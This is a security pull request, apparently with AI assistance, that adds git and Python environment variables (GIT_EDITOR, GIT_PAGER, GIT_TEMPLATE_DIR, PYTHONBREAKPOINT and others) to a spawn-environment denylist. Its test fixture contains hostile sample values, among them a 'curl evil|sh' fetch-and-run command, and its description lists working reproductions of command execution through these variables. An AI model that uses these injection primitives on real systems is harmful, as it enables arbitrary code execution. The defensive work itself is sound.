### PR TITLE
fix(security): block remaining spawned-helper and interpreter env primitives

### DIFF
--- a/packages/core/src/security/spawn-env-policy.test.ts
+++ b/packages/core/src/security/spawn-env-policy.test.ts
@@ -62,6 +62,14 @@ describe("isBlockedSpawnEnvKey (loader/interpreter hijack keys)", () => {
 		"GIT_CONFIG_COUNT",
 		"GIT_CONFIG_KEY_0",
 		"GIT_CONFIG_VALUE_0",
+		"GIT_CONFIG_GLOBAL",
+		"GIT_CONFIG_SYSTEM",
+		"git_config_global",
+		"GIT_EDITOR",
+		"GIT_SEQUENCE_EDITOR",
+		"GIT_PAGER",
+		"GIT_TEMPLATE_DIR",
+		"PYTHONBREAKPOINT",
 	])("blocks %s", (key) => {
 		expect(isBlockedSpawnEnvKey(key)).toBe(true);
 	});
@@ -86,6 +94,18 @@ describe("isBlockedSpawnEnvKey (loader/interpreter hijack keys)", () => {
 		expect(isBlockedSpawnEnvKey("GIT_AUTHOR_NAME")).toBe(false);
 		expect(isBlockedSpawnEnvKey("GIT_COMMITTER_NAME")).toBe(false);
 		expect(isBlockedSpawnEnvKey("GIT_TERMINAL_PROMPT")).toBe(false);
+		// Shares the first ten characters of the GIT_CONFIG_ prefix; the trailing
+		// underscore is what makes that family a namespace, so this must not match.
+		expect(isBlockedSpawnEnvKey("GIT_CONFIGURATION")).toBe(false);
+		// Bare GIT_CONFIG does not resolve aliases, so it is not an execution
+		// primitive and is deliberately absent from the denylist.
+		expect(isBlockedSpawnEnvKey("GIT_CONFIG")).toBe(false);
+		// git resolves its editor from GIT_EDITOR / core.editor / EDITOR and never
+		// consults VISUAL, so VISUAL is not a git execution primitive.
+		expect(isBlockedSpawnEnvKey("VISUAL")).toBe(false);
+		// EDITOR *is* spawned by git, but it is a universal variable rather than a
+		// git-specific one; see the PR discussion before adding it here.
+		expect(isBlockedSpawnEnvKey("EDITOR")).toBe(false);
 	});
 });
 
@@ -126,5 +146,27 @@ describe("sanitizeSpawnEnv", () => {
 			SAFE_KEY: "ok",
 		});
 		expect(out).toEqual({ SAFE_KEY: "ok" });
+	});
+
+	it("drops git config-file and spawned-helper primitives, keeps benign git keys", () => {
+		const out = sanitizeSpawnEnv({
+			GIT_CONFIG_GLOBAL: "/tmp/evil.gitconfig",
+			GIT_CONFIG_SYSTEM: "/tmp/evil.gitconfig",
+			GIT_EDITOR: "sh -c 'curl evil|sh'",
+			GIT_SEQUENCE_EDITOR: "sh -c 'curl evil|sh'",
+			GIT_PAGER: "sh -c 'curl evil|sh'",
+			GIT_TEMPLATE_DIR: "/tmp/evil-template",
+			PYTHONBREAKPOINT: "os.system",
+			GIT_AUTHOR_NAME: "test",
+			GIT_CONFIGURATION: "not-a-primitive",
+			PYTHON_VERSION: "3.13",
+			SAFE_KEY: "ok",
+		});
+		expect(out).toEqual({
+			GIT_AUTHOR_NAME: "test",
+			GIT_CONFIGURATION: "not-a-primitive",
+			PYTHON_VERSION: "3.13",
+			SAFE_KEY: "ok",
+		});
 	});
 });

--- a/packages/core/src/security/spawn-env-policy.ts
+++ b/packages/core/src/security/spawn-env-policy.ts
@@ -48,6 +48,13 @@ export const BLOCKED_SPAWN_ENV_KEYS: ReadonlySet<string> = new Set([
 	// expands message filters that can embed arbitrary module references.
 	"PYTHONINSPECT",
 	"PYTHONWARNINGS",
+	// PYTHONBREAKPOINT names the callable that builtins.breakpoint() invokes, so
+	// a script that calls breakpoint() runs whatever it names — e.g. os.system.
+	// This is MORE conditional than PYTHONINSPECT above, which fires on any
+	// script: it needs the target to reach a breakpoint() call. Listed anyway
+	// because python/python3 are both on ALLOWED_MCP_COMMANDS and a stray debug
+	// call is a realistic trigger.
+	"PYTHONBREAKPOINT",
 	"PERL5OPT",
 	"PERL5LIB",
 	"PERLIO_DEBUG",
@@ -95,12 +102,28 @@ export const BLOCKED_SPAWN_ENV_KEYS: ReadonlySet<string> = new Set([
 	// GIT_SSH substitutes the SSH binary just like GIT_SSH_COMMAND;
 	// GIT_ASKPASS executes an arbitrary external program for credential prompts;
 	// GIT_CONFIG_COUNT + indexed GIT_CONFIG_KEY_n / GIT_CONFIG_VALUE_n inject
-	// command-bearing git configuration (e.g. core.sshCommand, core.editor).
+	// command-bearing git configuration (e.g. core.sshCommand, core.editor);
+	// GIT_CONFIG_GLOBAL / GIT_CONFIG_SYSTEM point git at an attacker-written
+	// config file, which carries the same command-bearing settings in bulk and
+	// needs no indexed pairs.
+	// GIT_EDITOR and GIT_SEQUENCE_EDITOR are spawned verbatim by commit and by
+	// rebase -i; GIT_PAGER is spawned whenever output is paged; GIT_TEMPLATE_DIR
+	// seeds .git/hooks at init time, so an attacker-supplied template directory
+	// plants a pre-commit hook that runs on the next commit.
+	// Bare GIT_CONFIG is deliberately absent: it does not resolve aliases and is
+	// not an execution primitive. VISUAL is absent because git does not consult
+	// it. Both verified against git 2.50.1.
 	"GIT_SSH_COMMAND",
 	"GIT_EXTERNAL_DIFF",
 	"GIT_SSH",
 	"GIT_ASKPASS",
 	"GIT_CONFIG_COUNT",
+	"GIT_CONFIG_GLOBAL",
+	"GIT_CONFIG_SYSTEM",
+	"GIT_EDITOR",
+	"GIT_SEQUENCE_EDITOR",
+	"GIT_PAGER",
+	"GIT_TEMPLATE_DIR",
 
 	"NODE_OPTIONS",
 	"NODE_EXTRA_CA_CERTS",


### PR DESCRIPTION
# Relates to

Follows the review of #18417, where @isfinne enumerated and executed five `GIT_CONFIG_*` primitives. Three landed via #18473. This PR adds the remaining two, plus five further primitives found by auditing the rest of the spawned-helper and interpreter surface rather than waiting for the next report.

Definition of Done: full standard in [`CONTRIBUTING.md`](../CONTRIBUTING.md).

- [x] This PR targets `develop` and is rebased onto the latest `origin/develop` with zero conflicts.
- [x] `bun install` and `bun run verify` were both run after sync. **`verify` fails on an unrelated pre-existing blocker:** `@elizaos/plugin-registry#lint:check` reports 2 Biome `organizeImports` errors in `plugins/plugin-registry/src/api/`. This reproduces identically on unmodified `origin/develop` with this commit absent, and this PR changes only two files under `packages/core/src/security/`. Everything preceding that stage passed: `check:agents-claude`, `check:biome-version`, the bun/turbo contract checks, `fix-deps:check`, `ensure-plugin-test-conventions:check`, and `audit:alias-read-guard`. Focused suites, typecheck and Biome for the changed files are recorded below.
- [x] A reviewer can confirm the change works without reading the code, from the evidence attached below.

# Contribution provenance

<!-- contribution-attribution:v1 -->
<!-- attribution-row:ai-assistance -->
- AI assistance: `yes`
<!-- attribution-row:models -->
- Model(s) used: `anthropic/claude-opus-5`
<!-- attribution-row:client -->
- Agent tooling: `claude-code`
<!-- attribution-row:skill-revision -->
- Skill path: `N/A - no contribution skill used`
<!-- attribution-row:status -->
- Provenance status: `self-reported`

# Sync with develop

- [x] Rebased onto `79794367`; zero conflicts.
- [x] Focused suites pass post-sync; see **Testing** below.

# Risks

Seven entries are added to `BLOCKED_SPAWN_ENV_KEYS`; nothing previously allowed-and-blocked flips, no control flow changes, and `isBlockedSpawnEnvKey` / `sanitizeSpawnEnv` are untouched.

**This list has two consumers that behave differently, and it matters here.** `sanitizeSpawnEnv` *strips* a blocked key silently. `validateMcpServerConfig` *rejects* the whole config — `rejectMcpEnvEntry` returns on the first blocked key (`mcp-server-config.ts:398`) and the server fails to start with an error. So for anyone whose MCP server config sets `GIT_EDITOR`, `GIT_PAGER` or any of the seven, this is not a silent tightening: it is a hard startup failure with a message naming the key. No in-tree MCP config is affected — the only in-tree references to any of these keys are in `packages/skills` and `packages/elizaos` tests that call `spawnSync` directly — but user configs are outside this repository. Flagging it rather than filing the change under "additive".

Over-blocking is the real risk, since both spawn consumers now sanitize the full merged environment (`shell-execution-router.ts:162`, `processQueue.ts:167`) — these keys are stripped from the inherited host environment, not only from a caller overlay. Two mitigations were checked rather than assumed:

- **No in-tree use.** `GIT_EDITOR`, `GIT_SEQUENCE_EDITOR`, `GIT_PAGER`, `GIT_TEMPLATE_DIR` and `PYTHONBREAKPOINT` each have **0** references anywhere in `packages/`, `plugins/` or `.github/`.
- **No hang.** `GIT_EDITOR=true` and `GIT_PAGER=cat` are common hang-prevention idioms, so stripping them could in principle make git block on an interactive editor or pager. Tested: `git commit --amend` with every editor variable unset and stdin closed exits in 0s, and `git log` with every pager variable unset returns in 0s both piped and under a pty. Neither hangs.

Four negative controls guard the boundary: `GIT_CONFIGURATION` (shares the first ten characters of the `GIT_CONFIG_` prefix), bare `GIT_CONFIG`, `VISUAL`, and `PYTHON_VERSION`.

# Background

## What does this PR do?

`develop` blocks five git variables and six `PYTHON*` variables. Auditing the rest of that surface — every documented variable these tools spawn as a program, or that causes them to run attacker-controlled content — found seven more that are not blocked, and each was reproduced as arbitrary execution against git 2.50.1 and CPython 3.13.3:

| Key | Trigger | Result |
|---|---|---|
| `GIT_CONFIG_GLOBAL` | any command reading config | EXECUTED |
| `GIT_CONFIG_SYSTEM` | any command reading config | EXECUTED |
| `GIT_EDITOR` | `git commit` | EXECUTED |
| `GIT_SEQUENCE_EDITOR` | `git rebase -i` | EXECUTED |
| `GIT_PAGER` | paged output (tty) | EXECUTED |
| `GIT_TEMPLATE_DIR` | `git init` → hook fires on commit | EXECUTED |
| `PYTHONBREAKPOINT` | script calls `breakpoint()` | EXECUTED |

`GIT_CONFIG_GLOBAL` / `GIT_CONFIG_SYSTEM` complete the family already half-covered: `GIT_CONFIG_COUNT` and both indexed prefixes are blocked, but a whole-file redirect reaches the same command-bearing settings — `alias.*`, `core.pager`, `core.sshCommand`, `diff.external`, `credential.helper` — with no counter required.

The other five are a different mechanism: the tool spawns them as programs directly. `GIT_TEMPLATE_DIR` copies attacker-supplied hooks into `.git/hooks` at init so they run on the next commit, and `PYTHONBREAKPOINT` names the callable `builtins.breakpoint()` invokes. `PYTHONBREAKPOINT` sits beside six `PYTHON*` keys already on the list. It is **more** conditional than its neighbour `PYTHONINSPECT`, though: `PYTHONINSPECT=1 python3 -c "print('ran')"` drops to an interactive interpreter on any script with no cooperation, whereas `PYTHONBREAKPOINT` needs the target to reach a `breakpoint()` call — verified both ways. It is included because `python` / `python3` are both on `ALLOWED_MCP_COMMANDS` and a stray debug call is a realistic trigger, not because the two are equivalent.

**Five keys were tested and deliberately left out**, rather than padding the list with plausible-looking entries:

- **bare `GIT_CONFIG`** — does not resolve aliases; not an execution primitive.
- **`VISUAL`** — git resolves its editor via `GIT_EDITOR` → `core.editor` → `EDITOR` and never consults `VISUAL`. Confirmed with `git var GIT_EDITOR`.
- **`GIT_PROXY_COMMAND`** — documented as executed for the `git://` transport, but I could not make it fire, so it is not claimed.
- **`NODE_REPL_EXTERNAL_MODULE`** — did not fire outside a REPL; `node` is an allowed MCP command, so this was checked rather than assumed.
- **`EDITOR`** and **`LESSOPEN`** — both *do* execute (see Known gaps). They are left out because they are universal variables rather than tied to one tool, and that is a maintainer's call rather than mine.

## What kind of change is this?

Bug fixes (non-breaking change which fixes an issue)

# Documentation changes needed?

My changes do not require a change to the project documentation.

# Testing

## Where should a reviewer start?

`packages/core/src/security/spawn-env-policy.ts` — the seven added entries and the comments recording why five others are absent. Then the test additions in `spawn-env-policy.test.ts`.

## Detailed testing steps

Each key was demonstrated by execution, then the source change was reverted and the same tests re-run.

```
$ git --version
git version 2.50.1

$ printf '[alias]\n\tpwn = !echo EXECUTED\n' > evil.gitconfig
GIT_CONFIG_GLOBAL=evil.gitconfig git pwn        -> EXECUTED
GIT_CONFIG_SYSTEM=evil.gitconfig git pwn        -> EXECUTED
GIT_EDITOR="sh -c 'touch M' #" git commit --amend   -> EXECUTED
GIT_SEQUENCE_EDITOR="sh -c 'touch M' #" git rebase -i HEAD~1  -> EXECUTED
GIT_PAGER="sh -c 'touch M'" git log -1   (under pty)          -> EXECUTED
GIT_TEMPLATE_DIR=<dir with hooks/pre-commit> git init; git commit -> EXECUTED

PYTHONBREAKPOINT=os.system python3 -c "breakpoint('touch M')"     -> EXECUTED

GIT_CONFIG=evil.gitconfig git pwn               -> not a git command  (excluded)
VISUAL=V git var GIT_EDITOR                     -> not consulted      (excluded)
PYTHONBREAKPOINT=os.system python3 -c "print(1)" -> no call, no exec  (conditional)
```

```
policy tests                                   1 file,  55 passed (55)
same tests, spawn-env-policy.ts reverted        1 file,  9 failed | 46 passed (55)
packages/core/src/security/                   30 files, 434 passed (434)
packages/agent server-helpers-mcp.test.ts      1 file,  33 passed (33)
packages/agent blocked-env-keys.test.ts        1 file,  11 passed (11)
packages/elizaos plugins.test.ts               1 file,   8 passed (8)
```

`node ../shared/scripts/generate-keywords.mjs && tsc --noEmit -p packages/core/tsconfig.json` exits 0 with zero errors. Biome clean on both changed files.

# Known gaps / failures

- **`EDITOR` is an execution primitive and is not blocked here.** `EDITOR="sh -c '…'" git commit --amend` executes, confirmed in isolation. It is excluded because unlike the seven added keys it is a universal variable — it has 3 in-tree references and is set in ordinary developer environments — so stripping it from every spawned child is a broader decision than this PR should make unilaterally. It is pinned as a negative control so the choice is explicit rather than an oversight. **If maintainers want it blocked, say so and I will add it with tests.**
- **`LESSOPEN` is an execution primitive and is not blocked here either.** `LESSOPEN="|sh -c '…' %s" less file` executes, confirmed directly. It belongs to the same class — `less` is git's default pager, so blocking `GIT_PAGER` while leaving `LESSOPEN` open is the pattern @isfinne described on #18417 as raising the bar by roughly nothing. It is excluded here for two reasons: I could **not** reproduce the git → `less` → `LESSOPEN` chain in this environment, so the specific claim is unproven, and like `EDITOR` it is a universal variable rather than a tool-specific one. Worth noting that `LESSOPEN` appears unblocked in @isfinne's own `sanitizeSpawnEnv` output on #18417. Happy to take it in a follow-up.
- **`GIT_PAGER` only executes when output is paged**, which requires a tty. The agent's own spawn path uses `stdio: ["ignore", "pipe", "pipe"]`, so it is not reachable there today. It is included because it is git-specific, has no legitimate in-tree use, and `sanitizeSpawnEnv` is exported API that other consumers may call with a pty.
- **`GIT_CONFIG_GLOBAL` has a legitimate hardening use, and blocking it removes that too.** `packages/skills/test/contribute-to-eliza.test.ts:230` sets `GIT_CONFIG_GLOBAL=/dev/null` and `GIT_CONFIG_SYSTEM=/dev/null` to isolate a fixture from the developer's real git config; `packages/elizaos/src/commands/plugins.test.ts:130` sets `GIT_CONFIG_GLOBAL` to a deliberately bad file. Neither reaches `sanitizeSpawnEnv` — the skills fixture passes its own env to `spawnSync`, and `plugins.ts` spawns git through `spawnSync`/`execFileSync` with no sanitizer in the path — and both suites pass with this patch. But the inversion is worth stating: if a caller ever routes that `/dev/null` redirect through the sanitizer, the redirect is stripped and git falls back to the real user config. Not worse than never setting it, but it silently defeats an intentional isolation.
- **`GIT_PROXY_COMMAND` is documented as an execution primitive but is not included**, because I could not reproduce it firing against an unreachable `git://` host. Absence here reflects a failed reproduction, not a judgement that it is safe.
- **This is still a denylist.** Six keys in one family were missing after four prior rounds on this advisory; the next interpreter or VCS added to `ALLOWED_MCP_COMMANDS` will bring its own. An allowlist for the MCP spawn path — where the child env is already "validated config env plus `PATH`" — would end that cycle, but that is a design change and out of scope here.
- **`plugin-agent-orchestrator` uses the indexed `GIT_CONFIG_*` family legitimately** (`credential-proxy-env.ts:227`) to install a `credential.helper` for spawned coding agents, and three deploy workflows set `safe.directory` the same way. Those keys are already blocked on `develop` and all of those paths use `execFile`, so this PR changes nothing for them — but that usage is in-tree confirmation that this family installs an executable.

# Evidence

<!-- evidence-head:346c5a5743a6e633de545faf70c5189c094441e2 -->

<!-- evidence-row:before-screenshots -->
- [x] N/A - no rendered UI; this adds entries to a `packages/core` denylist constant.
<!-- evidence-row:after-screenshots -->
- [x] N/A - no rendered UI; behavior is asserted by the unit tests above.
<!-- evidence-row:walkthrough-video -->
- [x] N/A - the observable behavior is a set-membership check; the executed git reproductions and the revert-and-fail run are the demonstration.
<!-- evidence-row:backend-logs -->
- [x] Full verification transcript inline below: six executed primitives, four excluded keys with the observation that excluded them, the no-hang check, tests with the fix, the same tests reverted, downstream consumer suites, typecheck and Biome.

<details><summary>Verification at <code>346c5a5</code> (git 2.50.1, vitest 4.1.5)</summary>

```
$ git --version
git version 2.50.1

--- execution reproductions (clean tree, HOME isolated) ---
GIT_CONFIG_GLOBAL    -> EXECUTED
GIT_CONFIG_SYSTEM    -> EXECUTED
GIT_EDITOR           -> EXECUTED      (git commit --amend)
GIT_SEQUENCE_EDITOR  -> EXECUTED      (git rebase -i HEAD~1, clean tree)
GIT_PAGER            -> EXECUTED      (under pty)   /  -  (piped)
GIT_TEMPLATE_DIR     -> EXECUTED      (hooks/pre-commit copied at init)
PYTHONBREAKPOINT     -> EXECUTED      (python3 -c "breakpoint('touch M')")

--- excluded, each tested ---
GIT_CONFIG           -> git: 'pwn' is not a git command
VISUAL               -> git var GIT_EDITOR ignores it
GIT_PROXY_COMMAND    -> could not reproduce
NODE_REPL_EXTERNAL_MODULE -> no execution outside a REPL
PYTHONBREAKPOINT, script without breakpoint() -> no execution (conditional)
EDITOR               -> EXECUTED, but universal; raised in Known gaps
LESSOPEN             -> EXECUTED via less; git chain unproven; Known gaps

--- no-hang check (perl alarm harness; sanity: sleep 10 under 3s -> 142) ---
git commit --amend, all editor vars unset, stdin closed  -> exit 1, 0s
git log -1, all pager vars unset, piped                  -> exit 1, 0s
git log -1, all pager vars unset, under pty              -> exit 1, 0s

--- suites ---
$ vitest run packages/core/src/security/spawn-env-policy.test.ts
      Tests  55 passed (55)

$ # spawn-env-policy.ts reverted to unmodified develop, same tests
      Tests  9 failed | 46 passed (55)

$ vitest run packages/core/src/security/
 Test Files  30 passed (30)
      Tests  434 passed (434)

$ vitest run packages/agent/test/api/server-helpers-mcp.test.ts     -> 33 passed
$ vitest run packages/agent/src/config/blocked-env-keys.test.ts     -> 11 passed
$ vitest run packages/elizaos/src/commands/plugins.test.ts          ->  8 passed

$ node ../shared/scripts/generate-keywords.mjs && tsc --noEmit -p ./tsconfig.json
TSC_EXIT=0    errors: 0

$ biome check packages/core/src/security/spawn-env-policy{,.test}.ts
Checked 2 files. No fixes applied.

--- over-block scan ---
GIT_EDITOR / GIT_SEQUENCE_EDITOR / GIT_PAGER / GIT_TEMPLATE_DIR / PYTHONBREAKPOINT
  0 in-tree references each across packages/, plugins/, .github/
```

</details>

<!-- evidence-row:frontend-logs -->
- [x] N/A - no frontend surface is touched.
<!-- evidence-row:llm-trajectory -->
- [x] N/A - no agent, prompt, provider, action, or model behavior changed.
<!-- evidence-row:domain-artifacts -->
- [x] N/A - no database, memory, wallet, scheduled-task, or generated-file output changed.

---

AI provider/model: Anthropic / claude-opus-5
Client / agent tooling: Claude Code
Contribution skill revision: N/A - no contribution skill used
Attribution status: self-reported
